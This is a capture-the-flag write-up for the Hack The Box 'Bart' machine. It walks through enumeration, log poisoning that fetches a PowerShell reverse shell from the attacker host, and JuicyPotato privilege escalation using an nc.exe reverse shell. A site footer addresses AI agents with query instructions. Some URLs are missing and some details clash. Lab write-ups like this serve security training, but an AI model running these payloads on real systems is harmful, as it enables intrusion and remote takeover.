# Bart

## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.81 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Mon Nov 7 11:36:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.81 Nmap scan report for 10.10.10.81 Host is up (0.060s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http # Nmap done at Mon Nov 7 11:37:08 2022 -- 1 IP address (1 host up) scanned in 26.68 seconds ``` {% endcode %} Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p80 10.10.10.81 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Mon Nov 7 11:38:02 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.81 Nmap scan report for 10.10.10.81 Host is up (0.040s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to http://forum.bart.htb/ | http-methods: |_ Potentially risky methods: TRACE Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Nov 7 11:38:17 2022 -- 1 IP address (1 host up) scanned in 15.19 seconds ``` {% endcode %} As we can see in the *nmap* report, the website on port *80* is doing a redirect to `forum.bart.htb`. Let's add that domain and `bart.htb` to the `/etc/hosts` file. > nano /etc/hosts ```nginx # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.81 forum.bart.htb bart.htb ``` Let's take a look at the website.

At some point, we can see the team members.

At the source code, there is one more member which is commented. Let's get all the members name. > curl -s | grep "name"" | grep -oP ">.\*?<" | tr -d "><" ``` Samantha Brown Daniel Simmons Robert Hilton Harvey Potter ``` Now we have a potential list of users. Note that the website is on `forum.bart.htb`, but there may be other subdomains available. > gobuster dns -d bart.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 200 * `dns` uses **DNS subdomain** enumeration mode. * `-d` target **domain**. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. ``` =============================================================== Gobuster v3.2.0-dev by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Domain: bart.htb [+] Threads: 200 [+] Timeout: 1s [+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt =============================================================== 2022/11/07 16:09:50 Starting gobuster in DNS enumeration mode =============================================================== Found: forum.bart.htb Found: monitor.bart.htb =============================================================== 2022/11/07 16:10:16 Finished =============================================================== ``` Let's add the `monitor.bart.htb` subdomain name to the `/etc/hosts` file. > nano /etc/hosts ```nginx # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb ``` The site shows a login page.

If we try random credentials, we won't be able to log in.

But the `Forgot password?` button seems to indicate if the user is valid.

## Exploitation At this point, I tried to check if any of the found users were valid, and the `harvey` user seems to be valid.

If we try the user `harvey`, and his surname `potter` as the password, we'll be able to log in.

Inside the `Server Monitor` application, we could see a server called `Internal Chat`.

The server runs on the `internal-01.bart.htb` subdomain.

Let's add the new subdomain to the `/etc/hosts` file > nano /etc/hosts ```nginx # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb ``` Then, we'll see that the new website contains another login form.

But the previous credentials are not valid in this case.

As the *Simple Chat* application is open source, we can insect it's source code from the *Github* [repository](https://github.com/magkopian/php-ajax-simple-chat). In the source code, we can see that there is one file called [register.php](https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register.php), but we are no able to access it. > curl -L * `-L` follow **redirects**. ``` The page cannot be displayed because an internal server error has occurred. ``` However, we can try to create a new user by sending a *POST* request to `register.php` with the `uname` and `passwd` parameters. > curl -X POST -d "uname=alfa8sa\&passwd=alfa8sa123" Now, we could log in as the new user we just created.

We will see a chat, where `bobby` is saying not to place development code there.

So, if we take a look at the source code, we'll see some *JavaScript* code which sends a *GET* request to some interesting *URL*. ```html ``` If we send a *GET* request to that URL, we'll get a `1` as a response. > curl "" ``` 1 ``` Note the `filename` parameter is set to `log.txt`. If we try to read the file, we'll see log entries indicating the user and the *User-Agent*. > curl "" ``` [2018-02-21 22:35:17] - harvey - Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 [2022-11-07 18:45:31] - harvey - curl/7.85.0 [2022-11-07 18:45:34] - harvey - curl/7.85.0 ``` We could try to change the `filename` parameter to one that doesn't exist, and has the `.php` extension, so we can inject *PHP* code, and eventually run commands on the system. In this case, I will create the `pwn.php` file, and set the *User-Agent* as a command which will download a file from my system called `rv.ps1`, which will send us a reverse shell. > curl "" -H "User-Agent: \](http://10.10.14.8/rv.ps1'\)'\);?>)" First, download the [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) file from *Nishang*, and add the following function at the end of the script. I will rename the file to `rv.ps1`. > mv Invoke-PowerShellTcp.ps1 rv.ps1 > > nano rv.ps1 ```powershell Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444 ``` Now, set a *netcat* listener on port *4444* with *rlwrap*. > rlwrap nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. And set a simple HTTP server with python on the current directory. > python -m http.server 80 If now we send s *GET* request to the `pwn.php` file, the payload will be executed and we should catch a reverse shell on our netcat listener. > curl "" ``` Listening on 0.0.0.0 4444 Connection received on 10.10.10.81 49673 Windows PowerShell running as user BART$ on BART Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\inetpub\wwwroot\internal-01\log>whoami nt authority\iusr ``` ## Privilege Escalation Let's see what privileges the user `nt authority\iusr` has. > whoami /priv ``` PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled ``` If a user has the *SeImpersonatePrivilege*, the first thing that comes to mind is *JuicyPotato*. {% hint style="info" %} **JuicyPotato** is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that *SeImpersonate* or *SeAssignPrimaryToken* are enabled. {% endhint %} To escalate privileges, we'll have to transfer `JuicyPotato.exe` to the victim machine. Let's set a python *HTTP* server on the directory where we have the *JuicyPotato* binary. > python -m SimpleHTTPServer And download the binaries from the desktop folder of the `nt authority\iusr` user. > certutil.exe -f -urlcache -split JuicyPotato.exe Before executing the `JuicyPotato.exe` binary, let's set another netcat listener on port *5555* to catch a reverse shell as the `NT AUTHORITY\SYSTEM` user. > nc -lvnp 5555 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. And let's set an SMB server on the directory where the `nc.exe` binary is located. > impacket-smbserver smbFolder $(pwd) -smb2support Finally, let's run the *JuicyPotato* binary to get a shell as the `NT AUTHORITY\SYSTEM` user. > .\JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.8 5555" * `-t` **createprocess** call. * `-l` COM server listen **port**. * `-p` **program** to launch. * `-a` specify command **arguments**. ``` Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 COM -> recv failed with error: 10038 ``` But we get an error. This is happening because *JuicyPotato* is using the default *CLSID*. If check for system information, we'll see the machine is a `Microsoft Windows Server 2008 R2 Datacenter`. > systeminfo ``` Host Name: BART OS Name: Microsoft Windows 10 Pro OS Version: 10.0.15063 N/A Build 15063 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00330-80110-20834-AA869 Original Install Date: 24/09/2017, 19:35:51 System Boot Time: 07/11/2022, 16:02:27 System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-gb;English (United Kingdom) Input Locale: en-gb;English (United Kingdom) Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 4,095 MB Available Physical Memory: 3,003 MB Virtual Memory: Max Size: 5,567 MB Virtual Memory: Available: 4,451 MB Virtual Memory: In Use: 1,116 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.81 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. ``` So we have to change the *CLSID* to a valid one. You can check a Windows 10 Pro *CLSID* list [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro). {% hint style="info" %} The Class ID, or **CLSID**, is a serial number that represents a unique ID for any application component in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key HKEY\_CLASSES\_ROOT\CLSID{CLSID value}. {% endhint %} If we change it for `{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}`, we should get the reverse shell. Then all we have to do is reap the harvest and take both the user flag and the root flag. > .\JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \10.10.14.8\smbFolder\nc.exe -e cmd 10.10.14.8 5555" -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" * `-t` **createprocess** call. * `-l` COM server listen **port**. * `-p` **program** to launch. * `-a` specify command **arguments**. * `-c` use **CLSID**. ``` Listening on 0.0.0.0 5555 Connection received on 10.10.10.81 49782 Microsoft Windows [Version 10.0.15063] (c) 2017 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>type \users\h.potter\desktop\user.txt 80f0378a52202e4dd1124561c95b64cb C:\Windows\system32>type \users\administrator\desktop\root.txt de8a53b5078c8b37fc29c1309d256a37 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/bart.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.